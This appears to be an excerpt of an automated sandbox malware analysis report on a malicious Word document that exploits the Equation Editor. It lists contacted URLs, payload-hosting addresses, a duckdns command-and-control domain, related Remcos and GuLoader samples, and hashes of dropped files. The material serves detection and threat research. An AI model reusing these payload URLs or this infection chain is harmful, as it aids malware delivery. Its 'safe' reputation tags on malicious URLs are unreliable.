                            http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.htmlbhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.nirsoft.netRegAsm.exe, 0000000D.00000002.405011674.0000000000184000.00000004.00000010.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://deff.nelreports.net/api/report?cat=msnbhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.jsbhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://go.microspowershell.exe, 0000000B.00000002.393985624.0000000002AFD000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comRegAsm.exe, 0000000F.00000002.402455012.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://cache.btrll.com/default/Pix-1x1.gifbhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683bhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.google.comRegAsm.exe, RegAsm.exe, 0000000F.00000002.402455012.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://geoplugin.net/json.gp/Cpowershell.exe, 0000000B.00000002.394834348.0000000003EA9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://o.aolcdn.com/ads/adswrappermsni.jsbhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://cdn.taboola.com/libtrc/msn-home-network/loader.jsbhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.msn.com/?ocid=iehpbhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://contoso.com/powershell.exe, 0000000B.00000002.394834348.0000000003299000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://nuget.org/nuget.exepowershell.exe, 0000000B.00000002.394834348.0000000003299000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033bhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://static.chartbeat.com/js/chartbeat.jsbhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.msn.com/de-de/?ocid=iehpbhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%bhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://login.yahoo.com/config/loginRegAsm.exefalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.nirsoft.net/RegAsm.exe, 0000000F.00000002.402455012.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://ocsp.entrust.net0Dpowershell.exe, 0000000B.00000002.396943694.00000000051C1000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000009.00000002.398949438.0000000002391000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.393985624.0000000002271000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3bhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683bhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(bhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9bhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_shbhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://85.239.241.184/50/fastgeecleancheckupnewthinkstobegetme.tIFmEQNEDT32.EXE, 00000007.00000002.379983063.00000000005AF000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.jsbhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://nuget.org/NuGet.exepowershell.exe, 0000000B.00000002.394834348.0000000003299000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://www.ccleaner.com/go/app_cc_pro_trialkeybhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://85.239.241.184/50/fastgeecleancheckupnewthinkstobegetme.tIFjEQNEDT32.EXE, 00000007.00000002.379983063.00000000005AF000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://crl.entrust.net/server1.crl0powershell.exe, 0000000B.00000002.396943694.00000000051C1000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.imvu.com/JKRegAsm.exe, 0000000F.00000002.402305414.000000000028C000.00000004.00000010.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://contextual.media.net/8/nrrV73987.jsbhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://85.239.241.184/50/gvt/gvt on 85.239.241.184.url.0.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.imvu.comRegAsm.exe, RegAsm.exe, 0000000F.00000002.402455012.0000000000400000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.402847850.0000000001D59000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://contoso.com/Iconpowershell.exe, 0000000B.00000002.394834348.0000000003299000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://contextual.media.net/bhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.jsbhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2bhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.msn.com/bhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://geoplugin.net/json.gp%ARegAsm.exe, 0000000C.00000002.911284833.00000000006D5000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 0000000B.00000002.396943694.00000000051C1000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549bhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://85.239.241.184powershell.exe, 0000000B.00000002.393985624.00000000024CA000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://ia601706.us.archive.orgpowershell.exe, 0000000B.00000002.393985624.00000000023AA000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://cdn.at.atwola.com/_media/uac/msn.htmlbhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://go.microsoft.cpowershell.exe, 0000000B.00000002.393589357.000000000019A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.google.com/accounts/serviceloginRegAsm.exefalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fsetbhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://secure.comodo.com/CPS0powershell.exe, 0000000B.00000002.396943694.00000000051C1000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://policies.yahoo.com/w3c/p3p.xmlbhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://ia601706.us.archive.org/2/items/new_image_LRpowershell.exe, 00000009.00000002.398949438.00000000024E1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://crl.entrust.net/2048ca.crl0powershell.exe, 0000000B.00000002.396943694.00000000051C1000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.msn.com/advertisement.ad.jsbhv71A7.tmp.13.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.ebuddy.comRegAsm.exe, RegAsm.exe, 0000000F.00000002.402455012.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            207.241.227.96
                            		ia601706.us.archive.orgUnited States
                            		7941INTERNET-ARCHIVEUStrue
                            95.217.202.210
                            		zeep.lyGermany
                            		24940HETZNER-ASDEtrue
                            45.89.247.65
                            		dremom2.duckdns.orgUnited Kingdom
                            		33657CMCSUStrue
                            178.237.33.50
                            		geoplugin.netNetherlands
                            		8455ATOM86-ASATOM86NLfalse
                            85.239.241.184
                            		unknownCzech Republic
                            		15685CASABLANCA-ASInternetCollocationProviderCZtrue

                            General Information

                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1508111
                            Start date and time:2024-09-09 17:33:30 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 10m 8s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:defaultwindowsofficecookbook.jbs
                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                            Number of analysed new started processes analysed:17
                            Number of new started drivers analysed:1
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:xrrwwstCMd.docx
                            renamed because original name is a hash value
                            Original Sample Name:f27f42ce5ed4153d4d30a383c800b415d4e5b78a08556fa2b4f57bdbb0802a76.docx
                            Detection:MAL
                            Classification:mal100.rans.phis.troj.spyw.expl.evad.winDOCX@16/32@8/5
                            EGA Information:
                            • Successful, ratio: 71.4%
                            HCA Information:
                            • Successful, ratio: 99%
                            • Number of executed functions: 185
                            • Number of non-executed functions: 316
                            Cookbook Comments:
                            • Found application associated with file extension: .docx
                            • Found Word or Excel or PowerPoint or XPS Viewer
                            • Attach to Office via COM
                            • Scroll down
                            • Close Viewer
                            • Override analysis time to 80111.1705693733 for current running targets taking high CPU consumption
                            • Override analysis time to 160222.341138747 for current running targets taking high CPU consumption

                            Warnings

                            • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, conhost.exe
                            • Execution Graph export aborted for target EQNEDT32.EXE, PID 3680 because there are no executed function
                            • Execution Graph export aborted for target powershell.exe, PID 3796 because it is empty
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size exceeded maximum capacity and may have missing disassembly code.
                            • Report size exceeded maximum capacity and may have missing network information.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • VT rate limit hit for: xrrwwstCMd.docx

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            11:34:34API Interceptor31x Sleep call for process: EQNEDT32.EXE modified
                            11:34:35API Interceptor5x Sleep call for process: wscript.exe modified
                            11:34:36API Interceptor90x Sleep call for process: powershell.exe modified
                            11:34:42API Interceptor6272378x Sleep call for process: RegAsm.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            95.217.202.210http://goofle.comGet hashmaliciousUnknownBrowse
                              45.89.247.65SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtfGet hashmaliciousRemcosBrowse
                                INV4092401.docx.docGet hashmaliciousRemcosBrowse
                                  PLATI CU OP 2024.docx.docGet hashmaliciousRemcosBrowse
                                    srr.exeGet hashmaliciousRemcosBrowse
                                      SKM_22724071511020.docx.docGet hashmaliciousRemcosBrowse
                                        178.237.33.50fYHJsEQSv0.exeGet hashmaliciousRemcosBrowse
                                        • geoplugin.net/json.gp
                                        PxPsy1hml9.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                        • geoplugin.net/json.gp
                                        XQmV6MKs53.exeGet hashmaliciousRemcosBrowse
                                        • geoplugin.net/json.gp
                                        GN31O4pSQN.exeGet hashmaliciousRemcosBrowse
                                        • geoplugin.net/json.gp
                                        OriginalBLShippingDocumentsInvoiceAwbCIPL0000.batGet hashmaliciousRemcos, GuLoaderBrowse
                                        • geoplugin.net/json.gp
                                        DHL AWB BL Copy 8900893000.exeGet hashmaliciousRemcosBrowse
                                        • geoplugin.net/json.gp
                                        Quotation.exeGet hashmaliciousRemcosBrowse
                                        • geoplugin.net/json.gp
                                        rfq_final_quater_product_purchase_order_import_list_09_09_2024_00000024.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                        • geoplugin.net/json.gp
                                        NDA_MD580 project.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                        • geoplugin.net/json.gp
                                        waybill_original_invoice_bl_packinglist_shipment_09_09_2024_0000000000000000000000000000_pdf.batGet hashmaliciousRemcos, GuLoaderBrowse
                                        • geoplugin.net/json.gp

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        dremom2.duckdns.orgSecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtfGet hashmaliciousRemcosBrowse
                                        • 45.89.247.65
                                        INV4092401.docx.docGet hashmaliciousRemcosBrowse
                                        • 45.89.247.65
                                        geoplugin.netfYHJsEQSv0.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        PxPsy1hml9.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                        • 178.237.33.50
                                        XQmV6MKs53.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        GN31O4pSQN.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        OriginalBLShippingDocumentsInvoiceAwbCIPL0000.batGet hashmaliciousRemcos, GuLoaderBrowse
                                        • 178.237.33.50
                                        DHL AWB BL Copy 8900893000.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        Quotation.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        rfq_final_quater_product_purchase_order_import_list_09_09_2024_00000024.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                        • 178.237.33.50
                                        NDA_MD580 project.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                        • 178.237.33.50
                                        waybill_original_invoice_bl_packinglist_shipment_09_09_2024_0000000000000000000000000000_pdf.batGet hashmaliciousRemcos, GuLoaderBrowse
                                        • 178.237.33.50
                                        zeep.lyhttp://goofle.comGet hashmaliciousUnknownBrowse
                                        • 95.217.202.210

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        INTERNET-ARCHIVEUSSecuriteInfo.com.Exploit.CVE-2017-11882.123.15030.28858.rtfGet hashmaliciousRemcosBrowse
                                        • 207.241.224.2
                                        PO FT-151-2024 PETROMAT.xlsGet hashmaliciousRemcosBrowse
                                        • 207.241.232.154
                                        Inquiry_0476452.xlsGet hashmaliciousRemcosBrowse
                                        • 207.241.224.2
                                        Request for Quotation_1.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                        • 207.241.227.86
                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.4528.19655.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 207.241.232.154
                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtfGet hashmaliciousRemcosBrowse
                                        • 207.241.224.2
                                        INV4092401.docx.docGet hashmaliciousRemcosBrowse
                                        • 207.241.232.154
                                        comprobante.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                        • 207.241.232.154
                                        PO_00978876.vbsGet hashmaliciousUnknownBrowse
                                        • 207.241.232.154
                                        INQUIRY#46789_SEPT24_Hafele_Trading_Shenzhen.jsGet hashmaliciousFormBookBrowse
                                        • 207.241.227.86
                                        HETZNER-ASDEmyfile.exeGet hashmaliciousSodinokibi, Chaos, Netwalker, Revil, TrojanRansomBrowse
                                        • 188.40.30.106
                                        doc_rfq Oferta KH 09281.pdf.com.exeGet hashmaliciousQuasarBrowse
                                        • 195.201.57.90
                                        Quotation.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 135.181.160.46
                                        uD9I18eLZ6.exeGet hashmaliciousPureLog Stealer, Raccoon Stealer v2, RedLine, zgRATBrowse
                                        • 116.203.232.114
                                        http://pratikg7028.github.io/Task4Get hashmaliciousHTMLPhisherBrowse
                                        • 78.46.22.25
                                        IDMan.exeGet hashmaliciousFredy StealerBrowse
                                        • 5.161.243.5
                                        IDMan.exeGet hashmaliciousFredy StealerBrowse
                                        • 5.161.243.5
                                        FZ6oyLoqGM.exeGet hashmaliciousUnknownBrowse
                                        • 159.69.88.171
                                        bin homebots io.batGet hashmaliciousUnknownBrowse
                                        • 195.201.57.90
                                        yJrZoOsgfl.exeGet hashmaliciousUnknownBrowse
                                        • 195.201.57.90
                                        CMCSUSPO FT-151-2024 PETROMAT.xlsGet hashmaliciousRemcosBrowse
                                        • 45.90.89.98
                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtfGet hashmaliciousRemcosBrowse
                                        • 45.89.247.65
                                        INV4092401.docx.docGet hashmaliciousRemcosBrowse
                                        • 45.89.247.65
                                        Document#.exeGet hashmaliciousRemcosBrowse
                                        • 45.89.247.84
                                        t7A1BhMgJ2.exeGet hashmaliciousRemcosBrowse
                                        • 45.89.247.135
                                        Swift Payment.xlsGet hashmaliciousFormBookBrowse
                                        • 45.89.247.151
                                        aS4XS9m23e.exeGet hashmaliciousRedLineBrowse
                                        • 85.209.133.187
                                        PO-014842-2.xlsGet hashmaliciousFormBookBrowse
                                        • 45.89.247.151
                                        August Shipment - Inv No. 041.xlsGet hashmaliciousRemcosBrowse
                                        • 45.90.89.98
                                        ATOM86-ASATOM86NLfYHJsEQSv0.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        PxPsy1hml9.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                        • 178.237.33.50
                                        XQmV6MKs53.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        GN31O4pSQN.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        OriginalBLShippingDocumentsInvoiceAwbCIPL0000.batGet hashmaliciousRemcos, GuLoaderBrowse
                                        • 178.237.33.50
                                        DHL AWB BL Copy 8900893000.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        Quotation.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        rfq_final_quater_product_purchase_order_import_list_09_09_2024_00000024.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                        • 178.237.33.50
                                        NDA_MD580 project.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                        • 178.237.33.50
                                        waybill_original_invoice_bl_packinglist_shipment_09_09_2024_0000000000000000000000000000_pdf.batGet hashmaliciousRemcos, GuLoaderBrowse
                                        • 178.237.33.50

                                        JA3 Fingerprints

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        05af1f5ca1b87cc9cc9b25185115607dSecuriteInfo.com.Exploit.CVE-2017-11882.123.15030.28858.rtfGet hashmaliciousRemcosBrowse
                                        • 207.241.227.96
                                        • 95.217.202.210
                                        PO FT-151-2024 PETROMAT.xlsGet hashmaliciousRemcosBrowse
                                        • 207.241.227.96
                                        • 95.217.202.210
                                        Inquiry_0476452.xlsGet hashmaliciousRemcosBrowse
                                        • 207.241.227.96
                                        • 95.217.202.210
                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.4528.19655.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 207.241.227.96
                                        • 95.217.202.210
                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtfGet hashmaliciousRemcosBrowse
                                        • 207.241.227.96
                                        • 95.217.202.210
                                        INV4092401.docx.docGet hashmaliciousRemcosBrowse
                                        • 207.241.227.96
                                        • 95.217.202.210
                                        comprobante.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                        • 207.241.227.96
                                        • 95.217.202.210
                                        Bill of Lading.xlsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 207.241.227.96
                                        • 95.217.202.210
                                        Purchase Order.xlsmGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 207.241.227.96
                                        • 95.217.202.210
                                        comprobante_swift0000099.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                        • 207.241.227.96
                                        • 95.217.202.210
                                        7dcce5b76c8b17472d024758970a406bPO FT-151-2024 PETROMAT.xlsGet hashmaliciousRemcosBrowse
                                        • 95.217.202.210
                                        Inquiry_0476452.xlsGet hashmaliciousRemcosBrowse
                                        • 95.217.202.210
                                        INV4092401.docx.docGet hashmaliciousRemcosBrowse
                                        • 95.217.202.210
                                        Bill of Lading.xlsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 95.217.202.210
                                        QUOTATION_SEPQTRA071244#U00faPDF.scrGet hashmaliciousUnknownBrowse
                                        • 95.217.202.210
                                        SecuriteInfo.com.Other.Malware-gen.18317.3179.xlsxGet hashmaliciousUnknownBrowse
                                        • 95.217.202.210
                                        SecuriteInfo.com.Other.Malware-gen.18317.3179.xlsxGet hashmaliciousUnknownBrowse
                                        • 95.217.202.210
                                        SecuriteInfo.com.Trojan.GenericKD.73998107.10440.22732.xlsxGet hashmaliciousUnknownBrowse
                                        • 95.217.202.210
                                        SecuriteInfo.com.Exploit.CVE-2017-0199.121.20522.7152.xlsxGet hashmaliciousFormBookBrowse
                                        • 95.217.202.210
                                        Thermo Fisher RFQ_TFS-1705.xlsGet hashmaliciousGuLoaderBrowse
                                        • 95.217.202.210

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):131072
                                        Entropy (8bit):0.025570670387298232
                                        Encrypted:false
                                        SSDEEP:6:I3DPcZtPHvxggLR0lKNp51xaRXv//4tfnRujlw//+GtluJ/eRuj:I3DPMtPPAgPUvYg3J/
                                        MD5:30840EFD5B76AE3C706DE663A65169DE
                                        SHA1:5DC11B577F0AE1E28C5F760E997EFB6D44FD7C3E
                                        SHA-256:C708F3EC03D39619C5B9E53F2AD63C49698207BEF16491B1774FEA825257450E
                                        SHA-512:57D74A91D93551509807E0C07FDCF538EA79C0462AB64B5593733AB50C017813B4C59E513EB3CD4876613A606FB97EB7A89692DC1848AF65BF350DF618823C45
                                        Malicious:false
                                        Reputation:low
                                        Preview:......M.eFy...z.]...H.O.......S,...X.F...Fa.q..............................0.)n4@....:~........... h|.qB.!..4........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):4760
                                        Entropy (8bit):4.834060479684549
                                        Encrypted:false
                                        SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                                        MD5:838C1F472806CF4BA2A9EC49C27C2847
                                        SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                                        SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                                        SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Download File
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):0.34726597513537405
                                        Encrypted:false
                                        SSDEEP:3:Nlll:Nll
                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                        Malicious:false
                                        Preview:@...e...........................................................

                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\fastgeecleancheckupnewthinkstobegetme[1].tiff

                                        Download File
                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF, CR line terminators
                                        Category:dropped
                                        Size (bytes):195478
                                        Entropy (8bit):3.8654176042193766
                                        Encrypted:false
                                        SSDEEP:3072:ElIR9Mt8PiEZZNdYogt5pNGwdBiLYXnKO81LZh+Ukf9IV:kU9Mt8PNNdYxXKv1h+U7V
                                        MD5:9C60CEE4860F1FB648D10AA19522CA83
                                        SHA1:592F4BC6EF04AFB622541DD0305272FD9A8B8100
                                        SHA-256:36083400B2237AAEC532B29FEE51CAD3CF82F4B32816716256B4A9718D118DDC
                                        SHA-512:3E349809E5EA1ABA37277B5F745AC3C45A1D375A57F4652543949334D1FFD44A5B0A62352D8B1BA9922E9A295FBD8B7C3D60BB01C91E138F0C86924DCBCE4D2C
                                        Malicious:false
